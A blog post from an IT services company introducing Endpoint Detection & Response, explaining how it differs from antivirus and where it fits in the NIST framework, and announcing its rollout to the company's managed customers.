Introducing Endpoint Detection & Response (EDR)

26.05.23

The Cyber Security landscape is continually evolving, with major attacks, threats and vulnerabilities hitting the news on a regular basis. One only needs to look at the recent supply-chain attack that impacted customers of Business Communications provider 3CX (3CX DesktopApp security issue – NCSC.GOV.UK) as an example of how UK businesses (including SMEs) can be compromised and adversely impacted.

Whilst security solutions such as Anti-Virus and traditional firewalls have served us well for many years (and continue to play a vital role), it has become necessary to bolster defences with the likes of Endpoint Detection & Response (EDR) and Next-Gen Firewall Solutions. In this blog, we’ll explore what EDR is, why it matters to your business and what to expect from Computer Geeks in the future:

What is Endpoint Detection & Response (EDR?)

Endpoint Detection and Response (EDR) is a cybersecurity solution that helps protect your business’s computer systems and networks from advanced cyber threats. It typically runs as an installed agent (similar to anti-virus) and focuses on detecting and responding to malicious activities and potential security breaches.

How does it differ from traditional signature based anti-virus?

Traditional signature-based antivirus solutions work by comparing files and programs against a database of known malware signatures. If a match is found, the antivirus software blocks or removes the identified threat. However, this approach is limited to detecting known threats and may struggle with new or sophisticated malware that has not been previously identified.

EDR, on the other hand, takes a more proactive and advanced approach to security. It continuously monitors and records endpoint activities, such as file changes, network connections, process execution, and system behaviour. By analysing this data in real-time and using advanced techniques like behavioural analytics and machine learning, EDR can identify suspicious activities and potential security breaches, even if they involve previously unseen or “zero-day” threats.

What is the NIST framework and where does EDR sit within it?

The NIST (National Institute of Standards and Technology) framework is a widely recognized and respected cybersecurity framework, although developed by the US government it remains relevant to UK businesses. NIST provides guidelines and best practices for managing and improving an organisation’s cybersecurity risk.

The NIST framework comprises of the following categories:

Identify, Protect, Detect, Respond, Recover

EDR falls under the category of “Detect” and “Respond” controls, and complements Anti-Virus solutions which focus on the “Protect” element. EDR plays a crucial role in the detection and response stages of cybersecurity incident management. EDR helps organizations quickly identify and respond to security incidents on their endpoints, enabling faster threat containment and minimizing potential damage.

How else might EDR benefit my business?

Not only does EDR allow for early detection of cyber threats that traditional antivirus solutions may miss, it is also a commonly requested solution when completing Cyber Insurance questionnaires. You’ll likely see a reduction on your premiums when compared to an environment that hasn’t implemented EDR.

What should I expect from Computer Geeks on EDR?

Computer Geeks will be rolling out EDR to all compatible devices for our Geeks Protect & Geeks Cloud customers from Q3 2023. As part of this change we’ll be transitioning away from Webroot Anti-Virus on Windows devices and instead coupling Managed Windows Defender with our EDR solution. Some devices such as Macs will continue to run Webroot alongside EDR.

We’ll be sending out some more detail on what to expect closer to the time, but we’re really excited to be able to introduce this fantastic technology to our clients at no additional cost.